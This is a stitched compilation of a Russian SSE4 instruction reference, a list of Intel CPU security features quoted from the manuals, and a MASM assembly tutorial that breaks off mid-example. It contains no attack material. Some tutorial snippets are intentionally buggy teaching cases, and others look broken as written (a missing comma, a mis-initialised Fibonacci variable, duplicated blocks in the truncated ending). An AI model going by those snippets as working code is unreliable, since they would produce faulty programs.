    • Output — { SAD0, SAD1, SAD2,… SAD7 }

Вычисление восьми сумм абсолютных значений разностей (SAD) смещённых 4-х байтных беззнаковых групп. Расположение операндов для 16-ти битных SAD определяется 3-мя битами непосредственного аргумента imm8.

s1 = imm8[2]*4
s2 = imm8[1:0]*4
SAD0 = |A(s1+0)-B(s2+0)| + |A(s1+1)-B(s2+1)| + |A(s1+2)-B(s2+2)| + |A(s1+3)-B(s2+3)|
SAD1 = |A(s1+1)-B(s2+0)| + |A(s1+2)-B(s2+1)| + |A(s1+3)-B(s2+2)| + |A(s1+4)-B(s2+3)|
SAD2 = |A(s1+2)-B(s2+0)| + |A(s1+3)-B(s2+1)| + |A(s1+4)-B(s2+2)| + |A(s1+5)-B(s2+3)|
...
SAD7 = |A(s1+7)-B(s2+0)| + |A(s1+8)-B(s2+1)| + |A(s1+9)-B(s2+2)| + |A(s1+10)-B(s2+3)|
  • PHMINPOSUW xmm1, xmm2/m128 — (Packed Horizontal Word Minimum)
    • Input — { A0, A1,… A7 }
    • Output — { MinVal, MinPos, 0, 0… }

Поиск среди 16-ти битных беззнаковых полей A0…A7 такого, который имеет минимальное значение (и позицию с меньшим номером, если таких полей несколько). Возвращается 16-ти битное значение и его позиция.

  • PMOV{SX,ZX}{B,W,D} xmm1, xmm2/m{64,32,16} — (Packed Move with Sign/Zero Extend)

Группа из 12-ти инструкций для расширения формата упакованных полей. Упакованные 8, 16, или 32-х битные поля из младшей части аргумента расширяются (со знаком или без) в 16, 32 или 64-х битные поля результата.

Входной формат Результирующий
формат
8 бит 16 бит 32 бита
PMOVSXBW 16 бит
PMOVZXBW
PMOVSXBD PMOVSXWD 32 бита
PMOVZXBD PMOVZXWD
PMOVSXBQ PMOVSXWQ PMOVSXDQ 64 бита
PMOVZXBQ PMOVZXWQ PMOVZXDQ

Векторные примитивы

  • P{MIN,MAX}{SB,UW,SD,UD} xmm1, xmm2/m128 — (Minimum/Maximum of Packed Signed/Unsigned Byte/Word/DWord Integers)

Каждое поле результата есть минимальное/максимальное значение соответствующих полей двух аргументов. Байтовые поля рассматриваются только как числа со знаком, 16-ти битные — только как числа без знака. Для 32-х битных упакованных полей предусмотрен вариант как со знаком, так и без.

  • PMULDQ xmm1, xmm2/m128 — (Multiply Packed Signed Dword Integers)
    • Input — { A0, A1, A2, A3 }, { B0, B1, B2, B3 }
    • Output — { A0*B0, A2*B2 }
      Перемножение 32-х битных полей со знаком с выдачей полных 64-х бит результата (две операции умножения над 0 и 2 полями аргументов).
  • PMULLD xmm1, xmm2/m128 — (Multiply Packed Signed Dword Integers and Store Low Result)
    • Input — { A0, A1, A2, A3 }, { B0, B1, B2, B3 }
    • Output — { low32(A0*B0), low32(A1*B1), low32(A2*B2), low32(A3*B3)
      Перемножение 32-х битных полей со знаком с выдачей младших 32-х бит результатов (четыре операции умножения над всеми полями аргументов).
  • PACKUSDW xmm1, xmm2/m128 — (Pack with Unsigned Saturation)
    Упаковка 32-х битных полей со знаком в 16-ти битные поля без знака с насыщением.
  • PCMPEQQ xmm1, xmm2/m128 — (Compare Packed Qword Data for Equal)
    Проверка 64-х битных полей на равенство и выдача 64-х битных масок.

    ставки/извлечения

    • INSERTPS xmm1, xmm2/m32, imm8 — (Insert Packed Single Precision Floating-Point Value)

    Вставка 32-х битного поля из xmm2 (возможно выбрать любой из 4 полей этого регистра) или из 32-х битной ячейки памяти в произвольное поле результата. Кроме того, для каждого из полей результата можно задать сброс его в +0.0.

    • EXTRACTPS r/m32, xmm, imm8 — (Extract Packed Single Precision Floating-Point Value)

    Извлечение 32-х битного поля из xmm регистра, номер поля указывается в младших 2 битах imm8. Если в качестве результата указан 64-х битный регистр, то его старшие 32 бита сбрасываются (расширение без знака).

    • PINSR{B,D,Q} xmm, r/m*, imm8 — (Insert Byte/Dword/Qword)

    Вставка 8, 32, или 64-х битного значения в указанное поле xmm регистра (остальные поля не изменяются).

    • PEXTR{B,W,D,Q} r/m*, xmm, imm8 — (Extract Byte/Word/Dword/Qword)

    Извлечение 8, 16, 32, 64 битного поля из указанного в imm8 поля xmm регистра. Если в качестве результата указан регистр, то его старшая часть сбрасывается (расширение без знака).

    Скалярное умножение векторов

    • DPPS xmm1, xmm2/m128, imm8 — (Dot Product of Packed Single Precision Floating-Point Values)
    • DPPD xmm1, xmm2/m128, imm8 — (Dot Product of Packed Double Precision Floating-Point Values)

    Скалярное умножение векторов (dot product) 32/64 битных полей. Посредством битовой маски в imm8 указывается, какие произведения полей должны суммироваться и что следует прописать в каждое поле результата: сумму указанных произведений или +0.0.

    Смешивания

    • BLENDV{PS,PD} xmm1, xmm2/m128, <xmm0> — (Variable Blend Packed Single/Double Precision Floating-Point Values)

    Выбор каждого 32/64-битного поля результата осуществляется в зависимости от знака такого же поля в неявном аргументе xmm0: либо из первого, либо из второго аргумента.

    • BLEND{PS,PD} xmm1, xmm2/m128, imm8 — (Blend Packed Single/Double Precision Floating-Point Values)

    Битовая маска (4 или 2 бита) в imm8 указывает из какого аргумента следует взять каждое 32/64-битное поле результата.

    • PBLENDVB xmm1, xmm2/m128, <xmm0> — (Variable Blend Packed Bytes)

    Выбор каждого байтового поля результата осуществляется в зависимости от знака байта такого же поля в неявном аргументе xmm0: либо из первого, либо из второго аргумента.

    • PBLENDW xmm1, xmm2/m128, imm8 — (Blend Packed Words)

    Битовая маска (8 бит) в imm8 указывает из какого аргумента следует взять каждое 16-битное поле результата.

    Проверки бит

    • PTEST xmm1, xmm2/m128 — (Logical Compare)

    Установить флаг ZF, если только в xmm2/m128 все биты помеченные маской из xmm1 равны нулю. Если все не помеченные биты равны нулю, то установить флаг CF. Остальные флаги (AF, OF, PF, SF) всегда сбрасываются. Инструкция не модифицирует xmm1.

    Округления

    • ROUND{PS, PD} xmm1, xmm2/m128, imm8 — (Round Packed Single/Double Precision Floating-Point Values)

    Округление всех 32/64-х битных полей. Режим округления (4 варианта) выбирается либо из MXCSR.RC, либо задаётся непосредственно в imm8. Также можно подавить генерацию исключения потери точности.

    • ROUND{SS, SD} xmm1, xmm2/m128, imm8 — (Round Scalar Single/Double Precision Floating-Point Values)

    Округление только младшего 32/64-х битного поля (остальные биты остаются неизменными).

    Чтение WC памяти

    • MOVNTDQA xmm1, m128 — (Load Double Quadword Non-Temporal Aligned Hint)

    Операция чтения, позволяющая ускорить (до 7.5 раз) работу с write-combining областями памяти.

    Новые инструкции SSE4.2

    Обработка строк

    Эти инструкции выполняют арифметические сравнения между всеми возможными парами полей (64 или 256 сравнений!) из обеих строк, заданных содержимым xmm1 и xmm2/m128. Затем булевые результаты сравнений обрабатываются для получения нужных результатов. Непосредственный аргумент imm8 управляет размером (байтовые или unicode строки, до 16/8 элементов каждая), знаковостью полей (элементов строк), типом сравнения и интерпретацией результатов.

    Ими можно производить в строке (области памяти) поиск символов из заданного набора или в заданных диапазонах. Можно сравнивать строки (области памяти) или производить поиск подстрок.

    Все они оказывают влияние на флаги процессора: SF устанавливается если в xmm1 не полная строка, ZF — если в xmm2/m128 не полная строка, CF — если результат не нулевой, OF — если младший бит результата не нулевой. Флаги AF и PF сбрасываются.

    • PCMPESTRI <ecx>, xmm1, xmm2/m128, <eax>, <edx>, imm8 — ()

    Явное задание размера строк в <eax>, <edx> (берётся абсолютная величина регистров с насыщение до 8/16, в зависимости от размера элементов строк. Результат в регистре ecx.

    • PCMPESTRM <xmm0>, xmm1, xmm2/m128, <eax>, <edx>, imm8 — ()

    Явное задание размера строк в <eax>, <edx> (берётся абсолютная величина регистров с насыщение до 8/16, в зависимости от размера элементов строк. Результат в регистре xmm0.

    • PCMPISTRI <ecx>, xmm1, xmm2/m128, imm8 — ()

    Неявное задание размера строк (производится поиск нулевых элементов к каждой из строк). Результат в регистре ecx.

    • PCMPISTRM <xmm0>, xmm1, xmm2/m128, imm8 — ()

    Неявное задание размера строк (производится поиск нулевых элементов к каждой из строк). Результат в регистре xmm0.

    Подсчет CRC32

    • CRC32 r32, r/m* — (Подсчет CRC32)

    Накопление значения CRC-32C (другие обозначения CRC-32/ISCSI CRC-32/CASTAGNOLI) для 8, 16, 32 или 64 битного аргумента (используется полином 0x1EDC6F41).

    Подсчет популяции единичных битов

    • POPCNT r, r/m* — (Return the Count of Number of Bits Set to 1)

    Подсчет числа единичных битов. Три варианта инструкции: для 16, 32 и 64-х битных регистров. Также присутствует в SSE4A от AMD.

    Векторные примитивы

    • PCMPGTQ xmm1, xmm2/m128 — (Compare Packed Qword Data for Greater Than)

    Проверка 64-х битных полей на «больше чем» и выдача 64-х битных масок.

    SSE4a

    Набор инструкций SSE4a был введен компанией AMD в процессоры на архитектуре Barcelona. Это расширение не доступно в процессорах Intel. Поддержка определяется через CPUID.80000001H:ECX.SSE4A[Bit 6] флаг.

    Инструкция Описание
    LZCNT/POPCNT Подсчет числа нулевых/единичных битов.
    EXTRQ/INSERTQ Комбинированные инструкции маскирования и сдвига
    MOVNTSD/MOVNTSS Скалярные инструкции потоковой записи

    AMD

Intel CPU security features

List of Intel CPU security features along with short descriptions taken from the Intel manuals.

WP (Write Protect) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR0.WP allows pages to be protected from supervisor-mode writes. If CR0.WP = 0, supervisor-mode write accesses are allowed to linear addresses with read-only access rights; if CR0.WP = 1, they are not (User-mode write accesses are never allowed to linear addresses with read-only access rights, regardless of the value of CR0.WP).

Interesting links:

NXE/XD (No-Execute Enable/Execute Disable) (PDF)

Regarding IA32_EFER MSR and NXE (Volume 3A, 4-3, Paragraph 4.1.3):

IA32_EFER.NXE enables execute-disable access rights for PAE paging and IA-32e paging. If IA32_EFER.NXE = 1, instructions fetches can be prevented from specified linear addresses (even if data reads from the addresses are allowed).

IA32_EFER.NXE has no effect with 32-bit paging. Software that wants to use this feature to limit instruction fetches from readable pages must use either PAE paging or IA-32e paging.

Regarding XD (Volume 3A, 4-17, Table 4-11):

If IA32_EFER.NXE = 1, execute-disable (if 1, instruction fetches are not allowed from the 4-KByte page controlled by this entry; see Section 4.6); otherwise, reserved (must be 0).

SMAP (Supervisor Mode Access Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override this protection by setting EFLAGS.AC.

SMEP (Supervisor Mode Execution Protection) (PDF)

Quoting Volume 3A, 4-3, Paragraph 4.1.3:

CR4.SMEP allows pages to be protected from supervisor-mode instruction fetches. If CR4.SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.

MPX (Memory Protection Extensions) (PDF)

Intel MPX introduces new bounds registers and new instructions that operate on bounds registers. Intel MPX allows an OS to support user mode software (operating at CPL = 3) and supervisor mode software (CPL < 3) to add memory protection capability against buffer overrun. It provides controls to enable Intel MPX extensions for user mode and supervisor mode independently. Intel MPX extensions are designed to allow software to associate bounds with pointers, and allow software to check memory references against the bounds associated with the pointer to prevent out of bound memory access (thus preventing buffer overflow).

Interesting links:

SGX (Software Guard Extensions) (PDF)

These extensions allow an application to instantiate a protected container, referred to as an enclave. An enclave is a protected area in the application’s address space (see Figure 1-1), which provides confidentiality and integrity even in the presence of privileged malware. Accesses to the enclave memory area from any software not resident in the enclave are prevented.

Interesting links:

Protection keys (PDF)

Quoting Volume 3A, 4-31, Paragraph 4.6.2:

The protection-key feature provides an additional mechanism by which IA-32e paging controls access to user-mode addresses. When CR4.PKE = 1, every linear address is associated with the 4-bit protection key located in bits 62:59 of the paging-structure entry that mapped the page containing the linear address. The PKRU register determines, for each protection key, whether user-mode addresses with that protection key may be read or written.

The following paragraphs, taken from LWN, shed some light on the purpose of memory protection keys:

One might well wonder why this feature is needed when everything it does can be achieved with the memory-protection bits that already exist. The problem with the current bits is that they can be expensive to manipulate. A change requires invalidating translation lookaside buffer (TLB) entries across the entire system, which is bad enough, but changing the protections on a region of memory can require individually changing the page-table entries for thousands (or more) pages. Instead, once the protection keys are set, a region of memory can be enabled or disabled with a single register write. For any application that frequently changes the protections on regions of its address space, the performance improvement will be large.

There is still the question (as asked by Ingo Molnar) of just why a process would want to make this kind of frequent memory-protection change. There would appear to be a few use cases driving this development. One is the handling of sensitive cryptographic data. A network-facing daemon could use a cryptographic key to encrypt data to be sent over the wire, then disable access to the memory holding the key (and the plain-text data) before writing the data out. At that point, there is no way that the daemon can leak the key or the plain text over the wire; protecting sensitive data in this way might also make applications a bit more resistant to attack.

Another commonly mentioned use case is to protect regions of data from being corrupted by «stray» write operations. An in-memory database could prevent writes to the actual data most of the time, enabling them only briefly when an actual change needs to be made. In this way, database corruption due to bugs could be fended off, at least some of the time. Ingo was unconvinced by this use case; he suggested that a 64-bit address space should be big enough to hide data in and protect it from corruption. He also suggested that a version of mprotect() that optionally skipped TLB invalidation could address many of the performance issues, especially if huge pages were used. Alan Cox responded, though, that there is real-world demand for the ability to change protection on gigabytes of memory at a time, and that mprotect() is simply too slow.

CET (Control-flow Enforcement Technology) (PDF)

Control-flow Enforcement Technology (CET) provides the following capabilities to defend against ROP/JOP style control-flow subversion attacks:

  • Shadow Stack – return address protection to defend against Return Oriented Programming,
  • Indirect branch tracking – free branch protection to defend against Jump/Call Oriented Programming.

Basic Practices in Assembly Language Programming

Contents

 

Introduction

Assembly language is a low-level programming language for niche platforms such as IoTs, device drivers, and embedded systems. Usually, it’s the sort of language that Computer Science students should cover in their coursework and rarely use in their future jobs. From TIOBE Programming Community Index, assembly language has enjoyed a steady rise in the rankings of the most popular programming languages recently.

In the early days, when an application was written in assembly language, it had to fit in a small amount of memory and run as efficiently as possible on slow processors. When memory becomes plentiful and processor speed is dramatically increased, we mainly rely on high level languages with ready made structures and libraries in development. If necessary, assembly language can be used to optimize critical sections for speed or to directly access non-portable hardware. Today assembly language still plays an important role in embedded system design, where performance efficiency is still considered as an important requirement.

In this article, we’ll talk about some basic criteria and code skills specific to assembly language programming. Also, considerations would be emphasized on execution speed and memory consumption. I’ll analyze some examples, related to the concepts of register, memory, and stack, operators and constants, loops and procedures, system calls, etc.. For simplicity, all samples are in 32-bit, but most ideas will be easily applied to 64-bit.

All the materials presented here came from my teaching [1] for years. Thus, to read this article, a general understanding of Intel x86-64 assembly language is necessary, and being familiar with Visual Studio 2010 or above is assumed. Preferred, having read Kip Irvine’s textbook [2] and the MASM Programmer’s Guide [3] are recommended. If you are taking an Assembly Language Programming class, this could be a supplemental reading for studies.

About instruction

The first two rules are general. If you can use less, don’t use more.

1. Using less instructions

Suppose that we have a 32-bit DWORD variable:

.data
   var1 DWORD 123

The example is to add var1 to EAX. This is correct with MOV and ADD:

mov ebx, var1
add eax, ebx

But as ADD can accept one memory operand, you can just

add eax, var1

2. Using an instruction with less bytes

Suppose that we have an array:

.data
   array DWORD 1,2,3

If want to rearrange the values to be 3,1,2, you could

mov eax,array           ;        eax =1
xchg eax,[array+4]      ; 1,1,3, eax =2
xchg eax,[array+8]      ; 1,1,2, eax =3
xchg array,eax          ; 3,1,2, eax =1

But notice that the last instruction should be MOV instead of XCHG. Although both can assign 3 in EAX to the first array element, the other way around in exchange XCHG is logically unnecessary.

Be aware of code size, MOV takes 5-byte machine code but XCHG takes 6, as another reason to choose MOV here:

00000011  87 05 00000000 R      xchg array,eax
00000017  A3 00000000 R         mov array,eax

To check machine code, you can generate a listing file in assembling or open the Disassembly window at runtime in Visual Studio. Also, you can look up from the Intel instruction manual.

About register and memory

In this section, we’ll use a popular example, the nth Fibonacci number, to illustrate multiple solutions in assembly language. The C function would be like:

unsigned int Fibonacci(unsigned int n)
{
    unsigned int previous = 1, current = 1, next = 0;
    for (unsigned int i = 3; i <= n; ++i) 
    {
        next = current + previous;
        previous = current;
        current = next;
    }
    return next;
}

3. Implementing with memory variables

At first, let’s copy the same idea from above with two variables previous and current created here

.data
   previous DWORD ?
   current  DWORD ?

We can use EAX store the result without the next variable. Since MOV cannot move from memory to memory, a register like EDX must be involved for assignment previous = current. The following is the procedure FibonacciByMemory. It receives n from ECX and returns EAX as the nth Fibonacci number calculated:

;------------------------------------------------------------
FibonacciByMemory PROC 
; Receives: ECX as input n 
; Returns: EAX as nth Fibonacci number calculated
;------------------------------------------------------------
   mov   eax,1         
   mov   previous,0         
   mov   current,0         
L1:
   add eax,previous       ; eax = current + previous      
   mov edx, current       ; previous = current
   mov previous, edx
   mov current, eax
loop   L1
   ret
FibonacciByMemory ENDP

4. If you can use registers, don’t use memory

A basic rule in assembly language programming is that if you can use a register, don’t use a variable. The register operation is much faster than that of memory. The general purpose registers available in 32-bit are EAX, EBX, ECX, EDX, ESI, and EDI. Don’t touch ESP and EBP that are for system use.

Now let EBX replace the previous variable and EDX replace current. The following is FibonacciByRegMOV, simply with three instructions needed in the loop:

;------------------------------------------------------------
FibonacciByRegMOV PROC 
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
   mov   eax,1         
   xor   ebx,ebx      
   xor   edx,edx      
L1:
   add  eax,ebx      ; eax += ebx
   mov  ebx,edx
   mov  edx,eax
loop   L1
   ret
FibonacciByRegMOV ENDP

A further simplified version is to make use of XCHG which steps up the sequence without need of EDX. The following shows FibonacciByRegXCHG machine code in its listing, where only two instructions of three machine-code bytes in the loop body:

           ;------------------------------------------------------------
000000DF    FibonacciByRegXCHG PROC
           ; Receives: ECX as input n
           ; Returns: EAX, nth Fibonacci number
           ;------------------------------------------------------------
000000DF  33 C0         xor   eax,eax
000000E1  BB 00000001   mov   ebx,1
000000E6             L1:
000000E6  93            xchg eax,ebx      ; step up the sequence
000000E7  03 C3         add  eax,ebx      ; eax += ebx
000000E9  E2 FB      loop   L1
000000EB  C3            ret
000000EC    FibonacciByRegXCHG ENDP

In concurrent programming

The x86-64 instruction set provides many atomic instructions with the ability to temporarily inhibit interrupts, ensuring that the currently running process cannot be context switched, and suffices on a uniprocessor. In someway, it also would avoid the race condition in multi-tasking. These instructions can be directly used by compiler and operating system writers.

5. Using atomic instructions

As seen above used XCHG, so called as atomic swap, is more powerful than some high level language with just one statement:

xchg  eax, var1

A classical way to swap a register with a memory var1 could be

mov ebx, eax
mov eax, var1
mov var1, ebx

Moreover, if you use the Intel486 instruction set with the .486 directive or above, simply using the atomic XADD is more concise in the Fibonacci procedure. XADD exchanges the first operand (destination) with the second operand (source), then loads the sum of the two values into the destination operand. Thus we have

           ;------------------------------------------------------------
000000EC    FibonacciByRegXADD PROC
           ; Receives: ECX as input n
           ; Returns: EAX, nth Fibonacci number
           ;------------------------------------------------------------
000000EC  33 C0         xor   eax,eax
000000EE  BB 00000001   mov   ebx,1
000000F3             L1:
000000F3  0F C1 D8      xadd eax,ebx   ; first exchange and then add
000000F6  E2 FB      loop   L1
000000F8  C3            ret
000000F9    FibonacciByRegXADD ENDP

Two atomic move extensions are MOVZX and MOVSX. Another worth mentioning is bit test instructions, BT, BTC, BTR, and BTS. For the following example

.data
  Semaphore WORD 10001000b
.code
  btc Semaphore, 6  ; CF=0, Semaphore WORD 11001000b

Imagine the instruction set without BTC, one non-atomic implementation for the same logic would be

mov ax, Semaphore
shr ax, 7
xor Semaphore,01000000b

Little-endian

An x86 processor stores and retrieves data from memory using little-endian order (low to high). The least significant byte is stored at the first memory address allocated for the data. The remaining bytes are stored in the next consecutive memory positions.

6. Memory representations

Consider the following data definitions:

.data
dw1 DWORD 12345678h
dw2 DWORD 'AB', '123', 123h
;dw3 DWORD 'ABCDE'  ; error A2084: constant value too large
by3 BYTE 'ABCDE', 0FFh, 'A', 0Dh, 0Ah, 0
w1 WORD 123h, 'AB', 'A'

For simplicity, the hexadecimal constants are used as initializer. The memory representation is as follows:

As for multiple-byte DWORD and WORD date, they are represented by the little-endian order. Based on this, the second DWORD initialized with 'AB' should be 00004142h and next '123' is 00313233h in their original order. You can’t initialize dw3 as 'ABCDE' that contains five bytes 4142434445h, while you really can initialize by3 in a byte memory since no little-endian for byte data. Similarly, see w1 for a WORD memory.

7. A code error hidden by little-endian

From the last section of using XADD, we try to fill in a byte array with first 7 Fibonacci numbers, as 01, 01, 02, 03, 05, 08, 0D. The following is such a simple implementation but with a bug. The bug does not show up an error immediately because it has been hidden by little-endian.

FibCount = 7
.data
FibArray BYTE FibCount DUP(0ffh)
BYTE 'ABCDEF' 

.code
   mov  edi, OFFSET FibArray       
   mov  eax,1             
   xor  ebx,ebx          
   mov  ecx, FibCount        
 L1:
   mov  [edi], eax                
   xadd eax, ebx                      
   inc  edi                  
 loop L1

To debug, I purposely make a memory 'ABCDEF' at the end of the byte array FibArray with seven 0ffhinitialized. The initial memory looks like this:

Let’s set a breakpoint in the loop. When the first number 01 filled, it is followed by three zeros as this:

But OK, the second number 01 comes to fill the second byte to overwrite three zeros left by the first. So on and so forth, until the seventh 0D, it just fits the last byte here:

All fine with an expected result in FibArray because of little-endian. Only when you define some memory immediately after this FibArray, your first three byte will be overwritten by zeros, as here 'ABCDEF' becomes 'DEF'. How to make an easy fix?

About runtime stack

The runtime stack is a memory array directly managed by the CPU, with the stack pointer register ESP holding a 32-bit offset on the stack. ESP is modified by instructions CALL, RET, PUSH, POP, etc.. When use PUSH and POP or alike, you explicitly change the stack contents. You should be very cautious without affecting other implicit use, like CALL and RET, because you programmer and the system share the same runtime stack.

8. Assignment with PUSH and POP is not efficient

In assembly code, you definitely can make use of the stack to do assignment previous = current, as in FibonacciByMemory. The following is FibonacciByStack where only difference is using PUSH and POPinstead of two MOV instructions with EDX.

;------------------------------------------------------------
FibonacciByStack 
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
   mov   eax,1         
   mov   previous,0         
   mov   current,0         
L1:
   add  eax,previous      ; eax = current + previous     
   push current           ; previous = current
   pop  previous
   mov  current, eax
loop   L1
   ret
FibonacciByStack ENDP

As you can imagine, the runtime stack built on memory is much slower than registers. If you create a test benchmark to compare above procedures in a long loop, you’ll find that FibonacciByStack is the most inefficient. My suggestion is that if you can use a register or memory, don’t use PUSH and POP.

9. Using INC to avoid PUSHFD and POPFD

When you use the instruction ADC or SBB to add or subtract an integer with the previous carry, you reasonably want to reserve the previous carry flag (CF) with PUSHFD and POPFD, since an address update with ADD will overwrite the CF. The following Extended_Add example borrowed from the textbook [2] is to calculate the sum of two extended long integers BYTE by BYTE:

;--------------------------------------------------------
Extended_Add PROC
; Receives: ESI and EDI point to the two long integers
;           EBX points to an address that will hold sum
;           ECX indicates the number of BYTEs to be added
; Returns:  EBX points to an address of the result sum
;--------------------------------------------------------
   clc                      ; clear the Carry flag
   L1:
      mov   al,[esi]        ; get the first integer
      adc   al,[edi]        ; add the second integer
      pushfd                ; save the Carry flag

      mov   [ebx],al        ; store partial sum
      add   esi, 1          ; point to next byte   
      add   edi, 1
      add   ebx, 1          ; point to next sum byte   
      popfd                 ; restore the Carry flag
   loop   L1                ; repeat the loop

   mov   dword ptr [ebx],0  ; clear high dword of sum
   adc   dword ptr [ebx],0  ; add any leftover carry
   ret
Extended_Add ENDP

As we know, the INC instruction makes an increment by 1 without affecting the CF. Obviously we can replace above ADD with INC to avoid PUSHFD and POPFD. Thus the loop is simplified like this:

L1:
   mov   al,[esi]        ; get the first integer
   adc   al,[edi]        ; add the second integer

   mov   [ebx],al        ; store partial sum
   inc   esi             ; add one without affecting CF
   inc   edi
   inc   ebx
loop   L1                ; repeat the loop

Now you might ask what if to calculate the sum of two long integers DWORD by DWORD where each iteration must update the addresses by 4 bytes, as TYPE DWORD. We still can make use of INC to have such an implementation:

clc
xor   ebx, ebx

L1:
    mov eax, [esi +ebx*TYPE DWORD]
    adc eax, [edi +ebx*TYPE DWORD]
    mov [edx +ebx*TYPE DWORD], eax
    inc ebx
loop  L1

Applying a scaling factor here would be more general and preferred. Similarly, wherever necessary, you also can use the DEC instruction that makes a decrement by 1 without affecting the carry flag.

10. Another good reason to avoid PUSH and POP

Since you and the system share the same stack, you should be very careful without disturbing the system use. If you forget to make PUSH and POP in pair, an error could happen, especially in a conditional jump when the procedure returns.

The following Search2DAry searches a 2-dimensional array for a value passed in EAX. If it is found, simply jump to the FOUND label returning one in EAX as true, else set EAX zero as false.

;------------------------------------------------------------
Search2DAry PROC
; Receives: EAX, a byte value to search a 2-dimensional array
;           ESI, an address to the 2-dimensional array
; Returns: EAX, 1 if found, 0 if not found
;------------------------------------------------------------
   mov  ecx,NUM_ROW        ; outer loop count

ROW:   
   push ecx                ; save outer loop counter
   mov  ecx,NUM_COL        ; inner loop counter

   COL:   
      cmp al, [esi+ecx-1]
      je FOUND   
   loop COL

   add esi, NUM_COL
   pop  ecx                ; restore outer loop counter
loop ROW                   ; repeat outer loop

   mov eax, 0
   jmp QUIT
FOUND: 
   mov eax, 1
QUIT:
   ret
Search2DAry ENDP

Let’s call it in main by preparing the argument ESI pointing to the array address and the search value EAX to be 31h or 30h respectively for not-found or found test case:

.data
ary2D   BYTE  10h,  20h,  30h,  40h,  50h
        BYTE  60h,  70h,  80h,  90h,  0A0h
NUM_COL = 5
NUM_ROW = 2

.code
main PROC
   mov esi, OFFSET ary2D
   mov eax, 31h            ; crash if set 30h 
   call Search2DAry
; See eax for search result
   exit
main ENDP

Unfortunately, it’s only working in not-found for 31h. A crash occurs for a successful searching like 30h, because of the stack leftover from an outer loop counter pushed. Sadly enough, that leftover being popped by RETbecomes a return address to the caller.

Therefore, it’s better to use a register or variable to save the outer loop counter here. Although the logic error is still, a crash would not happen without interfering with the system. As a good exercise, you can try to fix.

Assembling time vs. runtime

I would like to talk more about this assembly language feature. Preferred, if you can do something at assembling time, don’t do it at runtime. Organizing logic in assembling indicates doing a job at static (compilation) time, not consuming runtime. Differently from high level languages, all operators in assembly language are processed in assembling such as +, -, *, and /, while only instructions work at runtime like ADD, SUB, MUL, and DIV.

11. Implementing with plus (+) instead of ADD

Let’s redo Fibonacci calculating to implement eax = ebx + edx in assembling with the plus operator by help of the LEA instruction. The following is FibonacciByRegLEA with only one line changed from FibonacciByRegMOV.

;------------------------------------------------------------
FibonacciByRegLEA 
; Receives: ECX as input n 
; Returns: EAX, nth Fibonacci number
;------------------------------------------------------------
   xor   eax,eax         
   xor   ebx,ebx      
   mov   edx,1      
L1:
   lea  eax, DWORD PTR [ebx+edx]  ; eax = ebx + edx
   mov  edx,ebx
   mov  ebx,eax
loop   L1

   ret
FibonacciByRegLEA ENDP

This statement is encoded as three bytes implemented in machine code without an addition operation explicitly at runtime:

000000CE  8D 04 1A      lea eax, DWORD PTR [ebx+edx]  ; eax = ebx + edx

This example doesn’t make too much performance difference, compared to FibonacciByRegMOV. But is enough as an implementation demo.

12. If you can use an operator, don’t use an instruction

For an array defined as:

.data
   Ary1 DWORD 20 DUP(?)

If you want to traverse it from the second element to the middle one, you might think of this like in other language:

mov esi, OFFSET Ary1
add esi, TYPE DWORD    ; start at the second value 
mov ecx LENGTHOF Ary1  ; total number of values
sub ecx, 1
div ecx, 2             ; set loop counter in half
L1:
   ; do traversing
Loop L1

Remember that ADD, SUB, and DIV are dynamic behavior at runtime. If you know values in advance, they are unnecessary to calculate at runtime, instead, apply operators in assembling:

mov esi, OFFSET Ary1 + TYPE DWORD   ; start at the second
mov ecx (LENGTHOF Ary1 -1)/2        ; set loop counter
L1:
   ; do traversing
Loop L1

This saves three instructions in the code segment at runtime. Next, let’s save memory in the data segment.

13. If you can use a symbolic constant, don’t use a variable

Like operators, all directives are processed at assembling time. A variable consumes memory and has to be accessed at runtime. As for the last Ary1, you may want to remember its size in byte and the number of elements like this:

.data
   Ary1 DWORD 20 DUP(?)
   arySizeInByte DWORD ($ - Ary1)  ; 80
   aryLength DWORD LENGTHOF Ary1   ; 20

It is correct but not preferred because of using two variables. Why not simply make them symbolic constants to save the memory of two DWORD?

.data
   Ary1 DWORD 20 DUP(?)
   arySizeInByte = ($ - Ary1)      ; 80
   aryLength EQU LENGTHOF Ary1     ; 20

Using either equal sign or EQU directive is fine. The constant is just a replacement during code preprocessing.

14. Generating the memory block in macro

For an amount of data to initialize, if you already know the logic how to create, you can use macro to generate memory blocks in assembling, instead of at runtime. The following macro creates all 47 Fibonacci numbers in a DWORD array named FibArray:

.data
val1 = 1
val2 = 1
val3 = val1 + val2 

FibArray LABEL DWORD
DWORD val1                ; first two values
DWORD val2
WHILE val3 LT 0FFFFFFFFh  ; less than 4-billion, 32-bit
   DWORD val3             ; generate unnamed memory data
   val1 = val2
   val2 = val3
   val3 = val1 + val2
ENDM

As macro goes to the assembler to be processed statically, this saves considerable initializations at runtime, as opposed to FibonacciByXXX mentioned before.

For more about macro in MASM, see my article Something You May Not Know About the Macro in MASM [4]. I also made a reverse engineering for the switch statement in VC++ compiler implementation. Interestingly, under some condition the switch statement chooses the binary search but without exposing the prerequisite of a sort implementation at runtime. It’s reasonable to think of the preprocessor that does the sorting with all known case values in compilation. The static sorting behavior (as opposed to dynamic behavior at runtime), could be implemented with a macro procedure, directives and operators. For details, please see Something You May Not Know About the Switch Statement in C/C++ [5].

About loop design

Almost every language provides an unconditional jump like GOTO, but most of us rarely use it based on software engineering principles. Instead, we use others like break and continue. While in assembly language, we rely more on jumps either conditional or unconditional to make control workflow more freely. In the following sections, I list some ill-coded patterns.

15. Encapsulating all loop logic in the loop body

To construct a loop, try to make all your loop contents in the loop body. Don’t jump out to do something and then jump back into the loop. The example here is to traverse a one-dimensional integer array. If find an odd number, increment it, else do nothing.

Two unclear solutions with the correct result would be possibly like:

   mov ecx, LENGTHOF array
   xor esi, esi
L1: 
   test array[esi], 1
   jnz ODD
PASS:
   add esi, TYPE DWORD
loop L1
   jmp DONE

ODD: 
  inc array[esi]
jmp PASS
DONE:
   mov ecx, LENGTHOF array
   xor esi, esi
   jmp L1

ODD: 
  inc array[esi]
jmp PASS

L1: 
